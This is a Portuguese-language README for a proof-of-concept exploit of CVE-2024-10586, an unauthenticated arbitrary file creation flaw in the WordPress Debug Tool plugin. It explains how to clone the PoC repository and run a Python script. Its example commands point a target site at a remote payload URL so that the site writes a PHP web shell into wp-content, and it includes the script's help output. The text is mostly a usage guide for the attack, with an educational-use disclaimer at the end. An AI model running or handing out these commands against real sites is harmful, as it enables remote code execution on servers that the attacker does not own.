
O plugin Debug Tool para WordPress é vulnerável à criação arbitrária de arquivos devido à ausência de verificação de capacidade na função dbt_pull_image() e à falta de validação do tipo de arquivo em todas as versões até, e incluindo, a 2.2.
Isso possibilita que atacantes não autenticados criem arquivos arbitrários, como arquivos .php, que podem ser usados para execução remota de código.
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
2. Execute o script com o seguinte comando:
python CVE-2024-10586.py -u <WordPress URL> -r <Remote File URL> -p <Optional Shell Path>
## Parâmetros
- -u, --url: A URL base do site WordPress (por exemplo, http://example.com/wordpress).
- -r, --remote: A URL do arquivo remoto a ser usado como fonte do payload.
- -p, --path: Opcional. O caminho onde o shell será salvo. O padrão é /opt/lampp/htdocs/wordpress/wp-content/Nxploit.php.
### Exemplo de Comando
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
### Exemplo de Uso
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options: -h, --help show this help message and exit -u URL, --url URL The base URL of the WordPress site. -r REMOTE, --remote REMOTE The remote URL to use in the 'source' parameter. -p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
### Aviso Legal
Este script é apenas para fins educacionais. Use-o com responsabilidade e somente em sistemas que você possua ou tenha permissão explícita para testar. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.